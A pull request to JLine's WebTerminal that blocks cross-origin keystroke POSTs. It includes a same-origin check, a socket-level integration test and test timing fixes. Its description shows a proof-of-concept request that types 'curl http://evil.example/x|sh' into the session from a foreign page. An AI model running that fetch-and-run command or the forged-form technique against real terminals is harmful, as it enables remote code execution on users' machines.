### PR TITLE
fix: reject cross-origin keystroke POSTs in WebTerminal

### DIFF
--- a/builtins/pom.xml
+++ b/builtins/pom.xml
@@ -66,6 +66,11 @@
             <scope>test</scope>
         </dependency>
         <dependency>
+            <groupId>org.awaitility</groupId>
+            <artifactId>awaitility</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
             <groupId>com.google.jimfs</groupId>
             <artifactId>jimfs</artifactId>
             <version>1.3.1</version>

--- a/builtins/src/main/java/org/jline/builtins/WebTerminal.java
+++ b/builtins/src/main/java/org/jline/builtins/WebTerminal.java
@@ -10,6 +10,7 @@ package org.jline.builtins;
 
 import java.io.*;
 import java.net.InetSocketAddress;
+import java.net.URI;
 import java.net.URLDecoder;
 import java.nio.charset.StandardCharsets;
 import java.util.HashMap;
@@ -343,6 +344,11 @@ public class WebTerminal extends LineDisciplineTerminal {
          * match the requested authority identifies a form or fetch coming from a foreign page.
          * Clients that are not browsers send no {@code Origin} and keep working as before.
          * </p>
+         * <p>
+         * The comparison assumes the server is reached directly on the address it binds. A
+         * reverse proxy or TLS terminator that rewrites {@code Host} to something other than the
+         * authority the browser used would make same-origin requests fail this check.
+         * </p>
          */
         private boolean isSameOrigin(HttpExchange exchange) {
             String origin = exchange.getRequestHeaders().getFirst("Origin");
@@ -350,8 +356,16 @@ public class WebTerminal extends LineDisciplineTerminal {
                 return true;
             }
             String host = exchange.getRequestHeaders().getFirst("Host");
-            int scheme = origin.indexOf("://");
-            return host != null && scheme >= 0 && host.equalsIgnoreCase(origin.substring(scheme + 3));
+            if (host == null) {
+                return false;
+            }
+            String authority;
+            try {
+                authority = URI.create(origin).getAuthority();
+            } catch (IllegalArgumentException e) {
+                return false;
+            }
+            return authority != null && host.equalsIgnoreCase(authority);
         }
 
         private Map<String, String> parseFormData(HttpExchange exchange) throws IOException {

--- a/builtins/src/main/java/org/jline/builtins/WebTerminal.java
+++ b/builtins/src/main/java/org/jline/builtins/WebTerminal.java
@@ -304,6 +304,11 @@ public class WebTerminal extends LineDisciplineTerminal {
                 return;
             }
 
+            if (!isSameOrigin(exchange)) {
+                exchange.sendResponseHeaders(403, -1);
+                return;
+            }
+
             // Parse form data
             Map<String, String> params = parseFormData(exchange);
 
@@ -329,6 +334,24 @@ public class WebTerminal extends LineDisciplineTerminal {
                 Thread.currentThread().interrupt();
                 sendResponse(exchange, "");
             }
+        }
+
+        /**
+         * Tells whether a request was issued by the page this terminal serves.
+         * <p>
+         * Browsers attach {@code Origin} to every cross-origin POST, so a value that does not
+         * match the requested authority identifies a form or fetch coming from a foreign page.
+         * Clients that are not browsers send no {@code Origin} and keep working as before.
+         * </p>
+         */
+        private boolean isSameOrigin(HttpExchange exchange) {
+            String origin = exchange.getRequestHeaders().getFirst("Origin");
+            if (origin == null) {
+                return true;
+            }
+            String host = exchange.getRequestHeaders().getFirst("Host");
+            int scheme = origin.indexOf("://");
+            return host != null && scheme >= 0 && host.equalsIgnoreCase(origin.substring(scheme + 3));
         }
 
         private Map<String, String> parseFormData(HttpExchange exchange) throws IOException {

--- a/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
+++ b/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
@@ -8,9 +8,12 @@
  */
 package org.jline.builtins;
 
+import java.io.BufferedReader;
 import java.io.IOException;
+import java.io.InputStreamReader;
 import java.io.OutputStream;
 import java.net.HttpURLConnection;
+import java.net.Socket;
 import java.net.URL;
 import java.nio.charset.StandardCharsets;
 import java.util.concurrent.CountDownLatch;
@@ -327,6 +330,76 @@ class WebTerminalIntegrationTest {
             assertEquals(405, conn.getResponseCode());
         } finally {
             conn.disconnect();
+        }
+    }
+
+    @Test
+    void testCrossOriginPostIsRejected() throws Exception {
+        // A page on another origin can submit a form to /terminal without a preflight,
+        // so the keystrokes would otherwise be typed into the session.
+        CountDownLatch readerReady = new CountDownLatch(1);
+        CountDownLatch lineRead = new CountDownLatch(1);
+        AtomicReference<String> readLine = new AtomicReference<>();
+
+        Thread readerThread = new Thread(() -> {
+            try {
+                LineReader reader =
+                        LineReaderBuilder.builder().terminal(terminal).build();
+                readerReady.countDown();
+                String line = reader.readLine("$ ");
+                readLine.set(line);
+                lineRead.countDown();
+            } catch (Exception e) {
+                // terminal closed
+            }
+        });
+        readerThread.setDaemon(true);
+        readerThread.start();
+
+        assertTrue(readerReady.await(5, TimeUnit.SECONDS));
+        Thread.sleep(200);
+
+        assertEquals(403, postWithOrigin("k=" + urlEncode("x"), "http://evil.example"));
+        assertEquals(403, postWithOrigin("k=" + urlEncode("\r"), "http://evil.example"));
+        // An opaque origin (sandboxed iframe, data: URL) is not the server either.
+        assertEquals(403, postWithOrigin("k=" + urlEncode("x"), "null"));
+
+        assertFalse(lineRead.await(1, TimeUnit.SECONDS), "Cross-origin keys must not reach the reader");
+
+        // The page served by this terminal still works.
+        assertEquals(200, postWithOrigin("k=" + urlEncode("h"), baseUrl));
+        assertEquals(200, postWithOrigin("k=" + urlEncode("i"), baseUrl));
+        assertEquals(200, postWithOrigin("k=" + urlEncode("\r"), baseUrl));
+
+        assertTrue(lineRead.await(5, TimeUnit.SECONDS), "Same-origin keys should reach the reader");
+        assertEquals("hi", readLine.get());
+    }
+
+    /**
+     * Helper: POST form data to the /terminal endpoint carrying an Origin header, as a browser
+     * does for a cross-site form submission, and return the status code. HttpURLConnection
+     * refuses to set Origin, so the request is written directly on the socket.
+     */
+    private int postWithOrigin(String formData, String origin) throws IOException {
+        URL url = new URL(baseUrl);
+        byte[] body = formData.getBytes(StandardCharsets.UTF_8);
+        String authority = url.getHost() + ":" + url.getPort();
+        String request = "POST /terminal HTTP/1.1\r\n" + "Host: "
+                + authority + "\r\n" + "Origin: "
+                + origin + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + "Content-Length: "
+                + body.length + "\r\n" + "Connection: close\r\n\r\n";
+
+        try (Socket socket = new Socket(url.getHost(), url.getPort())) {
+            OutputStream os = socket.getOutputStream();
+            os.write(request.getBytes(StandardCharsets.US_ASCII));
+            os.write(body);
+            os.flush();
+
+            BufferedReader in =
+                    new BufferedReader(new InputStreamReader(socket.getInputStream(), StandardCharsets.UTF_8));
+            String status = in.readLine();
+            assertNotNull(status, "server closed the connection without a response");
+            return Integer.parseInt(status.split(" ")[1]);
         }
     }
 

--- a/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
+++ b/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
@@ -390,6 +390,7 @@ class WebTerminalIntegrationTest {
                 + body.length + "\r\n" + "Connection: close\r\n\r\n";
 
         try (Socket socket = new Socket(url.getHost(), url.getPort())) {
+            socket.setSoTimeout(5000);
             OutputStream os = socket.getOutputStream();
             os.write(request.getBytes(StandardCharsets.US_ASCII));
             os.write(body);

--- a/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
+++ b/builtins/src/test/java/org/jline/builtins/WebTerminalIntegrationTest.java
@@ -16,6 +16,7 @@ import java.net.HttpURLConnection;
 import java.net.Socket;
 import java.net.URL;
 import java.nio.charset.StandardCharsets;
+import java.time.Duration;
 import java.util.concurrent.CountDownLatch;
 import java.util.concurrent.TimeUnit;
 import java.util.concurrent.atomic.AtomicReference;
@@ -26,6 +27,7 @@ import org.junit.jupiter.api.AfterEach;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 
+import static org.awaitility.Awaitility.await;
 import static org.junit.jupiter.api.Assertions.*;
 
 /**
@@ -125,13 +127,7 @@ class WebTerminalIntegrationTest {
         readerThread.start();
 
         assertTrue(readerReady.await(5, TimeUnit.SECONDS), "LineReader should be ready");
-        // Give the reader time to display the prompt
-        Thread.sleep(200);
-
-        // Poll to get the prompt displayed
-        String response = postToTerminal("f=1");
-        assertNotNull(response);
-        assertTrue(response.contains("$"), "Should show the prompt: " + response);
+        awaitPrompt();
 
         // Send "hi" followed by Enter
         postToTerminal("k=" + urlEncode("h"));
@@ -165,7 +161,7 @@ class WebTerminalIntegrationTest {
         readerThread.start();
 
         assertTrue(readerReady.await(5, TimeUnit.SECONDS));
-        Thread.sleep(200);
+        awaitPrompt();
 
         // Type "abc", then backspace to delete 'c', then Enter
         postToTerminal("k=" + urlEncode("a"));
@@ -199,7 +195,7 @@ class WebTerminalIntegrationTest {
         readerThread.start();
 
         assertTrue(readerReady.await(5, TimeUnit.SECONDS));
-        Thread.sleep(200);
+        awaitPrompt();
 
         // Type "hel" then Tab
         postToTerminal("k=" + urlEncode("h"));
@@ -207,17 +203,14 @@ class WebTerminalIntegrationTest {
         postToTerminal("k=" + urlEncode("l"));
         postToTerminal("k=" + urlEncode("\t"));
 
-        // Wait for completion to be processed
-        Thread.sleep(500);
-
-        // Poll to see the completion result
-        String response = postToTerminal("f=1");
-        assertNotNull(response);
         // After "hel" + Tab, the common prefix "hel" should be shown,
         // and completions "hello" and "help" should appear
-        assertTrue(
-                response.contains("hello") || response.contains("help") || response.contains("hel"),
-                "Tab completion should show candidates: " + response);
+        await().atMost(5, TimeUnit.SECONDS).pollInterval(Duration.ofMillis(50)).untilAsserted(() -> {
+            String response = postToTerminal("f=1");
+            assertTrue(
+                    response.contains("hello") || response.contains("help") || response.contains("hel"),
+                    "Tab completion should show candidates: " + response);
+        });
     }
 
     @Test
@@ -242,7 +235,7 @@ class WebTerminalIntegrationTest {
         readerThread.start();
 
         assertTrue(readerReady.await(5, TimeUnit.SECONDS));
-        Thread.sleep(200);
+        awaitPrompt();
 
         // Type "ac", move left, insert "b", then Enter
         // Result should be "abc"
@@ -357,7 +350,7 @@ class WebTerminalIntegrationTest {
         readerThread.start();
 
         assertTrue(readerReady.await(5, TimeUnit.SECONDS));
-        Thread.sleep(200);
+        awaitPrompt();
 
         assertEquals(403, postWithOrigin("k=" + urlEncode("x"), "http://evil.example"));
         assertEquals(403, postWithOrigin("k=" + urlEncode("\r"), "http://evil.example"));
@@ -421,6 +414,15 @@ class WebTerminalIntegrationTest {
         String response = new String(conn.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
         conn.disconnect();
         return response;
+    }
+
+    /**
+     * Helper: poll the screen until the reader has entered readLine() and displayed its prompt.
+     */
+    private void awaitPrompt() {
+        await().atMost(5, TimeUnit.SECONDS)
+                .pollInterval(Duration.ofMillis(50))
+                .untilAsserted(() -> assertTrue(postToTerminal("f=1").contains("$"), "Prompt should be visible"));
     }
 
     /**


### PR DESCRIPTION
Cross-origin POST to /terminal on an unpatched build, no preflight involved:

    > POST /terminal HTTP/1.1
    > Host: localhost:52341
    > Origin: http://evil.example
    > Content-Type: application/x-www-form-urlencoded
    >
    > k=curl+http%3A%2F%2Fevil.example%2Fx%7Csh    then k=%0D

    < HTTP/1.1 200 OK
    LineReader received: [curl http://evil.example/x|sh]

TerminalAjaxHandler validates only the request method, so any page the user has open can auto-submit a form at the terminal and type a command into the session. Binding to localhost is the only boundary WebTerminal has, and a cross-site form POST goes straight through it.

Requests now need their Origin, when present, to match the request Host; clients that send none are left alone.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Reject cross-origin web terminal AJAX POST requests with HTTP 403 when the `Origin` header doesn’t match the request host.
  * Deny unauthorized requests before any terminal input processing or output rendering.
  * Continue allowing requests that omit `Origin` or are same-origin.
* **Tests**
  * Added an integration test that verifies cross-origin POST rejection (including opaque `"null"` origin) using raw HTTP over a socket.
  * Improved test timing by replacing fixed waits with a prompt-wait helper and enhanced assertions for tab completion.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->